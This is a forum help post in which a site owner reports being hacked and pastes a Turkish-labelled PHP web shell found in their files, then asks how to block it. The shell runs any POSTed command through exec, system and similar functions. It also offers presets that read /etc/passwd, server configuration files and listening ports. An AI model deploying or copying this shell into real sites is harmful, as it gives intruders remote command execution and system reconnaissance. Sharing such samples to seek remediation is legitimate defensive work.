Strange php code found on my website


Posted on 16th Feb 2014 07:03 pm by admin

I got hacked and the following code was placed within my files:

Code: [Select]<?
/*
Did you know?Explore Trending and Topic pages for more stories like this.
Kodlama By Liz0ziM
Safe Mode Command Execution Shell
*/
function safeshell($komut)
{
ini_restore("safe_mode");
ini_restore("open_basedir");
$res = '';
if (!empty($komut))
{
if(function_exists('exec'))
{
@exec($komut,$res);
$res = join("n",$res);
}
elseif(function_exists('shell_exec'))
{
$res = @shell_exec($komut);
}
elseif(function_exists('system'))
{
@ob_start();
@system($komut);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru'))
{
@ob_start();
@passthru($komut);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($komut,"r")))
{
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}
}
return $res;
}
echo "<b><font color=blue>Liz0ziM Private Safe Mode Command Execution Bypass Exploit</font></b>
";
print_r('
<pre>
<form method="POST" action="">
<b><font color=blue>Komut :</font></b><input name="baba" type="text"><input value="?al??t?r" type="submit">
</form>
<form method="POST" action="">
<b><font color=blue>H?zl? Men? :=) :</font><select size="1" name="liz0">
<option value="cat /etc/passwd">/etc/passwd</option>
<option value="netstat -an | grep -i listen">T?m A??k Portalar? G?r</option>
<option value="cat /var/cpanel/accounting.log">/var/cpanel/accounting.log</option>
<option value="cat /etc/syslog.conf">/etc/syslog.conf</option>
<option value="cat /etc/hosts">/etc/hosts</option>
<option value="cat /etc/named.conf">/etc/named.conf</option>
<option value="cat /etc/httpd/conf/httpd.conf">/etc/httpd/conf/httpd.conf</option>
</select> <input type="submit" value="G?ster Bakim">
</form>
</pre>
');
ini_restore("safe_mode");
ini_restore("open_basedir");
if($_POST[baba]!= "") { $liz0=safeshell($_POST[baba]); }
if($_POST[liz0]!= "") { $liz0zim=safeshell($_POST[liz0]); }
$uid=safeshell('id');
$server=safeshell('uname -a');
echo "<pre><h4>";
echo "<b><font color=red>Kimim Ben :=)</font></b>:$uid
";
echo "<b><font color=red>Server</font></b>:$server
";
echo "<b><font color=red>Komut Sonu?lar?:</font></b>
";
if($_POST["baba"]!= "") { echo $liz0; }
if($_POST["liz0"]!= "") { echo $liz0zim; }
echo "</h4></pre>";
?>
How would i patch this?, like is their any code i can add to a global file to prevent this "safemode bypass"?
No comments posted yet

Your Answer:

Login to answer
167 Like 46 Dislike
Previous forums Next forums
Other forums

can i optmize image to 50% quality before uploading 2 server
Hi there

i have jus written a php program to upload and display images but when i try to uplo

UL and LI Add Form
The idea I want here is when the user click on a character name from the drop down select bar at the

string to currency format
Hi guys...

Actually I chunk out some data from txtfile and one of the data contains amount va

Need Help with a query
Hello,
For some reason I am just not getting the right answer when I do this query and not quite

Remove values in array2 from array1
I have two arrays.

Array 1 is where the array key holds various different numbers. For exampl

What's wrong with my code
sobbing for many days, still don't know why please Help. Why my page isn't posted correctly. In a

$_POST variable un-useable
I'm trying to use a $_POST variable in a mysql update statement but i can't use it for some unknown

How can I uploading Transactional Data from Legacy to New SAP system
Hell Gurus,

I am overwhelmed with questions on how to migrate huge volume of Sales Orders

Serial number of exernal hard disk/Thumbdrive
Hi guys, I am new tio java networking concepts.Please tel me how to get Serial number of exernal

IMAGE - SERVER SIDE scripting help...
How to receive pixel data of an image and buid a bitmap file on the server using the HTTP POST metho

Sign up to write
Sign up now if you have flare of writing..
Login   |   Register
Follow Us
Indyaspeak @ Facebook Indyaspeak @ Twitter Indyaspeak @ Pinterest RSS



Play Free Quiz and Win Cash